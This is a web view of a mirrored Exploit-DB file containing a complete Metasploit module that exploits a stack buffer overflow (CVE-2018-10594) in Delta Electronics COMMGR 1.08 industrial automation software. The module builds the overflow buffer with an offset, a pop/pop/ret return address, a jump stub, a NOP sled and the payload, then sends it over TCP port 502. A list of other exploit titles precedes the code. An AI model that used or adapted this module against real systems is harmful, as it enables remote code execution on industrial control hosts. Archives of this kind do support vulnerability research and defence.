bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/windows/remote/45574.rb
Offensive Security 6fe17058fb DB: 2018-10-10 
15 changes to exploits/shellcodes

Microsoft Edge Chakra JIT - 'BailOutOnInvalidatedArrayHeadSegment' Check Bypass
Microsoft Edge Chakra JIT - Type Confusion

Seqrite End Point Security 7.4 - Privilege Escalation

Free MP3 CD Ripper 2.8 - '.wma' Buffer Overflow (SEH) (DEP Bypass)

360 3.5.0.1033 - Sandbox Escape
ghostscript - executeonly Bypass with errorhandler Setup
ifwatchd - Privilege Escalation (Metasploit)

FTPShell Server 6.80 - 'Add Account Name' Buffer Overflow (SEH)

Delta Electronics Delta Industrial Automation COMMGR 1.08 - Stack Buffer Overflow (Metasploit)

Wikidforum 2.20 - 'select_sort' SQL Injection

Wikidforum 2.20 - 'message_id' SQL Injection

Monstra 3.0.4 - Cross-Site Scripting
2018-10-10 05:01:44 +00:00

79 lines
No EOL
2.3 KiB
Ruby
Executable file
Raw Blame History

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'Delta Electronics Delta Industrial Automation COMMGR 1.08 Stack Buffer Overflow',
'Description' => %q{
This module exploits a stack based buffer overflow in Delta Electronics Delta Industrial
Automation COMMGR 1.08. The vulnerability exists in COMMGR.exe when handling specially
crafted packets. This module has been tested successfully on Delta Electronics Delta
Industrial Automation COMMGR 1.08 over
Windows XP SP3,
Windows 7 SP1, and
Windows 8.1.
},
'Author' =>
[
'ZDI', # Initial discovery
't4rkd3vilz', # PoC
'hubertwslin' # Metasploit module
],
'References' =>
[
[ 'CVE', '2018-10594' ],
[ 'BID', '104529' ],
[ 'ZDI', '18-586' ],
[ 'ZDI', '18-588' ],
[ 'EDB', '44965' ],
[ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-18-172-01' ]
],
'Payload' =>
{
'Space' => 640,
'DisableNops' => true,
'BadChars' => "\x00"
},
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Platform' => 'win',
'Targets' =>
[
[ 'COMMGR 1.08 / Windows Universal',
{
'Ret' => 0x00401e14, # p/p/r COMMGR.exe
'Offset' => 4164
}
],
],
'DisclosureDate' => 'Jul 02 2018',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(502)
])
end
def exploit
data = rand_text_alpha(target['Offset'])
data << "\xeb\x27\x90\x90" # jmp short $+27 to the NOP sled
data << [target.ret].pack("V")
data << make_nops(40)
data << payload.encoded
print_status("Trying target #{target.name}, sending #{data.length} bytes...")
connect
sock.put(data)
disconnect
end
end
Reference in a new issue View git blame Copy permalink